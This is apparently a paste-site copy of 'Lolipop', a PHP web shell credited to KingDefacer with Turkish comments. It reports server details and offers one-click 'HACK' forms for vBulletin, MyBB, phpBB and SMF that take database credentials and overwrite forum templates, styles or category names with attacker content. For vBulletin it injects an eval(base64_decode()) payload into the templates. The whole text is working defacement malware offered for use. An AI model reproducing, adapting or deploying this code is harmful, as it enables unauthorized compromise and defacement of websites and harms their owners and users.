Lolipop Shell - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 7:49 a.m.

FORMAT: Text only

SIZE: 14.8 kB

HITS: 591

  1. <p align="right"></p><body bgcolor="#FFFFFF">
  2. <?php
  3. ######################## Begining of Coding ;) ######################
  4. error_reporting(0);
  5. $info = $_SERVER['SERVER_SOFTWARE'];
  6. $site = getenv("HTTP_HOST");
  7. $page = $_SERVER['SCRIPT_NAME'];
  8. $sname = $_SERVER['SERVER_NAME'];
  9. $uname = php_uname();
  10. $smod = ini_get('safe_mode');
  11. $disfunc = ini_get('disable_functions');
  12. $yourip = $_SERVER['REMOTE_ADDR'];
  13. $serverip = $_SERVER['SERVER_ADDR'];
  14. $version = phpversion();
  15. $ccc = realpath($_GET['chdir'])."/";
  16. $fdel = $_GET['fdel'];
  17. $execute = $_POST['execute'];
  18. $cmd = $_POST['cmd'];
  19. $commander = $_POST['commander'];
  20. $ls = "ls -la";
  21. $source = $_POST['source'];
  22. $gomkf = $_POST['gomkf'];
  23. $title = $_POST['title'];
  24. $sourcego = $_POST['sourcego'];
  25. $ftemp = "tmp";
  26. $temp = tempnam($ftemp, "cx");
  27. $fcopy = $_POST['fcopy'];
  28. $tuser = $_POST['tuser'];
  29. $user = $_POST['user'];
  30. $wdir = $_POST['wdir'];
  31. $tdir = $_POST['tdir'];
  32. $symgo = $_POST['symgo'];
  33. $sym = "xhackers.txt";
  34. $to = $_POST['to'];
  35. $sbjct = $_POST['sbjct'];
  36. $msg = $_POST['msg'];
  37. $header = "From:".$_POST['header'];
  38. //PHPinfo
  39. if(isset($_POST['phpinfo']))
  40. {
  41. die(phpinfo());
  42. }
  43. //Guvenli mod vs vs
  44. if ($smod)
  45. {
  46. $c_h = "<font color=red face='Verdana' size='1'>ON</font>";
  47. }
  48. else
  49. {
  50. $c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
  51. }
  52. //Kapali Fonksiyonlar
  53. if (''==($disfunc))
  54. {
  55. $dis = "<font color=green>None</font>";
  56. }
  57. else
  58. {
  59. $dis = "<font color=red>$disfunc</font>";
  60. }
  61. //Dizin degisimi
  62. if(isset($_GET['dir']) && is_dir($_GET['dir']))
  63. {
  64. chdir($_GET['dir']);
  65. }
  66. $ccc = realpath($_GET['chdir'])."/";
  67. //Baslik
  68. echo "<head>
  69. <style>
  70. body { font-size: 12px;
  71. font-family: arial, helvetica;
  72. scrollbar-width: 5;
  73. scrollbar-height: 5;
  74. scrollbar-face-color: black;
  75. scrollbar-shadow-color: silver;
  76. scrollbar-highlight-color: silver;
  77. scrollbar-3dlight-color:silver;
  78. scrollbar-darkshadow-color: silver;
  79. scrollbar-track-color: black;
  80. scrollbar-arrow-color: silver;
  81. }
  82. </style>
  83. <title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>";
  84. //Ana tablo
  85. echo "<body text='#FFFFFF'>
  86. <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
  87. <tr>
  88. <td><font color='#000000'>
  89. <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font>
  90. </tr>
  91. <tr>
  92. <td style='border: 1px solid #333333'>
  93. <font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>
  94. </tr>
  95. </table>";
  96. echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr>
  97. ';
  98. //Buton Listesi
  99. echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center>";
  100. //VB HACK
  101. if (isset($_POST['vbulletin']))
  102. {
  103. echo "<center><table border=0 width='100%'>
  104. <tr><td>
  105. <center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center>
  106. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  107. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  108. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  109. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  110. <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
  111. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  112. die();
  113. }
  114. $KingDefacer="Powered By Lolipop :))";
  115. $dbh = $_POST['dbh'];
  116. $dbu = $_POST['dbu'];
  117. $dbn = $_POST['dbn'];
  118. $dbp = $_POST['dbp'];
  119. $index = $_POST['index'];
  120. $index=str_replace("\'","'",$index);
  121. $set_index = "{\${eval(base64_decode(\'";
  122. $set_index .= base64_encode("echo \"$index\";");
  123. $set_index .= "\'))}}{\${exit()}}</textarea>";
  124. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
  125. {
  126. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
  127. mysql_select_db($dbn) or die(mysql_error());
  128. $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'";
  129. $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'";
  130. $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''";
  131. $result = mysql_query($loli1) or die (mysql_error());
  132. $result = mysql_query($loli2) or die (mysql_error());
  133. $result = mysql_query($loli3) or die (mysql_error());
  134. echo "<script>alert('Vb Hacked');</script>";
  135. }
  136. //MyBB Hack
  137. if (isset($_POST['mybulletin']))
  138. {
  139. echo "<center><table border=0 width='100%'>
  140. <tr><td>
  141. <center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center>
  142. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  143. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  144. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  145. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  146. <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
  147. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  148. die();
  149. }
  150. $mybb_dbh = $_POST['mybbdbh'];
  151. $mybb_dbu = $_POST['mybbdbu'];
  152. $mybb_dbn = $_POST['mybbdbn'];
  153. $mybb_dbp = $_POST['mybbdbp'];
  154. $mybb_index = $_POST['mybbindex'];
  155. if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
  156. {
  157. mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
  158. mysql_select_db($mybb_dbn) or die(mysql_error());
  159. $prefix="mybb_";
  160. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  161. $result = mysql_query($loli7) or die (mysql_error());
  162. echo "<script>alert('MyBB Hacked');</script>";
  163. }
  164. //PhpBB
  165. if (isset($_POST['phpbb']))
  166. {
  167. echo "<center><table border=0 width='100%'>
  168. <tr><td>
  169. <center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center>
  170. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  171. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  172. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  173. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  174. <font face='Arial' color='#000000'>Yazi Veya KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  175. <font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  176. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  177. die();
  178. }
  179. $phpbb_dbh = $_POST['phpbbdbh'];
  180. $phpbb_dbu = $_POST['phpbbdbu'];
  181. $phpbb_dbn = $_POST['phpbbdbn'];
  182. $phpbb_dbp = $_POST['phpbbdbp'];
  183. $phpbb_kat = $_POST['phpbbkat'];
  184. $kategoriid=$_POST['katid'];
  185. if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat))
  186. {
  187. mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error());
  188. mysql_select_db($phpbb_dbn) or die(mysql_error());
  189. $loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'";
  190. $result = mysql_query($loli10) or die (mysql_error());
  191. echo "<script>alert('PhpBB Hacked');</script>";
  192. }
  193. //SmfHACK
  194. if (isset($_POST['smf']))
  195. {
  196. echo "<center><table border=0 width='100%'>
  197. <tr><td>
  198. <center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center>
  199. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  200. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  201. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  202. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  203. <font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  204. <font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  205. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  206. die();
  207. }
  208. $smf_dbh = $_POST['smfdbh'];
  209. $smf_dbu = $_POST['smfdbu'];
  210. $smf_dbn = $_POST['smfdbn'];
  211. $smf_dbp = $_POST['smfdbp'];
  212. $smf_index = $_POST['smf_index'];
  213. $smf_katid=$_POST['katid'];
  214. if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index))
  215. {
  216. mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
  217. mysql_select_db($smf_dbn) or die(mysql_error());
  218. $prefix="smf_";
  219. $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'";
  220. $result = mysql_query($loli12) or die (mysql_error());
  221. echo "<script>alert('smf Hacked');</script>";
  222. }
  223. //Alt taraf
  224. echo "
  225. <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'>
  226. <tr>
  227. <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'>
  228. <p><strong>Lolipop.php</strong></p>
  229. <p><strong>Edited By KingDefacer</strong></p>
  230. <p><strong></strong><br>
  231. </p></td>
  232. </tr></table>";
  233. // Kod bitisi
  234. ?>

comments powered by Disqus